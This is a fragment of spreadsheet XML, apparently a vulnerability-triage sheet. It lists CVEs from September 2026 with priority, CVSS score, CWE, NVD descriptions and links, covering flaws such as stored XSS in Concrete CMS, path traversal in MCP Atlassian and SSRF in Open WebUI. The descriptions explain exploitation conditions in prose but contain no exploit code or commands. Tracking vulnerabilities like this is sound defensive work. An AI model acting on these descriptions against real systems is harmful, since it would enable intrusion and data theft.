      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31278</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>An issue in the /api/v2/setting/adserversetting endpoint of Suprema BioStar 2 before 2.9.12 and and BioStar X before 1.0.2 allows attackers to obtain Active Directory service account credentials in cleartext by supplying a crafted GET request.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31278</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61595</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M553" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-636, CWE-862</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.tenants` isolation was enforced only on the HTTP path. The current tenant was stored in `threading.local()` and set exclusively by the HTTP-only `TenantMiddleware`, so on the live (WebSocket/SSE) path `get_current_tenant()` was always `None` during mount and every event handler — and the tenant-aware `QuerySet` manager failed OPEN (returned the unfiltered queryset, ignoring `STRICT_MODE`), disclosing every tenant's rows to whoever held the socket. `threading.local` was additionally shared across connections on the `sync_to_async` executor thread. This issue is fixed in djust 1.0.7. Tenant storage moved to a `contextvars.ContextVar` (per async task); the resolved tenant is bound around WS/SSE mount and every dispatch; both managers scope the base queryset once and fail CLOSED (`.none()` under the default `STRICT_MODE`); and system check S006 warns when `STRICT_MODE=False`. No known workarounds are available on the live path.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61595</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62997</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>Kedro-Datasets provides data connectors for Kedro. From version 5.0.0 until 9.5.0, kedro_datasets_experimental.pytorch.PyTorchDataset in kedro-datasets loads .pt model files with torch.load without enforcing weights_only=True, and user-supplied load_args are silently dropped. On PyTorch versions earlier than 2.6, a malicious pickle-backed model from an attacker-influenced shared registry, downloaded checkpoint, or partitioned external source can execute arbitrary code when a Kedro pipeline loads it. The issue affects only the opt-in kedro_datasets_experimental component and does not affect users who load only trusted files. This issue is fixed in version 9.5.0.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62997</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73439</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-842</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, if OpenConfig is configured and running a gNMI server on the system, and if gNSI Pathz is configured and a gNSI Pathz policy is present on the system, then gNMI may fail to correctly enforce the rules in this policy if both a group rule and a user rule for the same path is present in the policy. Under certain conditions, this can lead to an authenticated user gaining unauthorized permission to read or write gNMI paths that the Pathz policy is intended to restrict.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73439</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73496</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr">
        <is>
          <t>atlassian</t>
        </is>
      </c>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to 0.22.0, the confluence_upload_attachment and confluence_upload_attachments tools pass a client-controlled file_path through src/mcp_atlassian/confluence/attachments.py upload_attachment, and the jira_update_issue attachments parameter reaches src/mcp_atlassian/jira/attachments.py upload_attachment, without confining either path to an approved server workspace. In a remote HTTP, SSE, or multi-user deployment, absolute or traversing paths are resolved on the MCP server and uploaded to Atlassian, allowing a client with write-tool access to disclose server files, environment-held Atlassian credentials, or another tenant's data. A local single-user stdio deployment does not cross this trust boundary because the server runs in the caller's environment. This issue is fixed in version 0.22.0.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73496</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81210</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 concatenates three caller-supplied strings into a String.format path on the shared /ds-storage RWX PVC and returns the file with no project ACL — pure IDOR plus traversal. Read is constrained to files named job.log/error.log, but DataStage job logs routinely carry connection strings, {dsnextenc} ciphertexts (decryptable via d2-f023), and customer-data row samples. This is the operator's tenant-to-tenant PVC-leakage threat verbatim; MEDIUM→HIGH via threat match.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81210</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85385</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.4 did not validate the user timezone value (uTimezone) on write and rendered it without output encoding on the Dashboard user management page, where Date::getTimezoneDisplayName() returns any non-IANA value unchanged. A stored cross-site scripting payload saved in this field executed in an administrator's browser when they viewed the affected user in the Dashboard, running script in the admin session (for example to read CSRF tokens, create administrator accounts, or change site settings). In Concrete CMS 9.5.3 the field became reachable by unauthenticated visitors through public registration; in Concrete CMS below 9.5.3,  the same field was reachable by any authenticated user through the account profile editor. Exploitation required concrete.misc.user_timezones to be enabled (off by default), and the unauthenticated path additionally required public registration to be enabled. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.7 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Suraj Bhosale for reporting.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85385</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86474</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>The lack of TLS certificate validation when downloading firmware updates in VEO and VEO-XS Wi-Fi monitors, in versions prior to 01.48.001, allows an attacker to perform man-in-the-middle attacks on the update channel.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86474</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86585</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>The lack of signature verification of firmware update packages in VEO and VEO-XS Wi-Fi monitors, in versions prior to 01.48.001, allows an attacker who controls the delivery of an update to install unauthorised firmware.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86585</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>A cross-namespace authorization flaw in multicluster-observability-addon allows a user with permission to modify a managed cluster’s ManagedClusterAddOn configuration to reference ClusterLogForwarder or OpenTelemetryCollector resources outside the permitted namespace. If those resources reference Secrets, the add-on may copy the referenced Secrets to the attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90025</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: displayport: Fix OOB altmode array index
The UCSI displayport driver indexes the connector's port altmode array
with the GET_CURRENT_CAM response after checking it is not 0xff. The
port altmode array is UCSI_MAX_ALTMODES elements long. If the PPM
returns an invalid GET_CURRENT_CAM response above UCSI_MAX_ALTMODES and
not equal to 0xff, the kernel may crash with an array index OOB error.
Update the UCSI displayport driver to verify the current cam is less
than UCSI_MAX_ALTMODES before accessing the port altmode array.</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90025</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76425</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the APIs of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks against the backend database.
This vulnerability is due to insufficient validation of certain parameters that are concatenated directly into an SQL query. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements to an affected endpoint. A successful exploit could allow the attacker to read arbitrary content from the SQL database and conduct server-side request forgery (SSRF) attacks. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76425</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79639</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79639</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K567" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
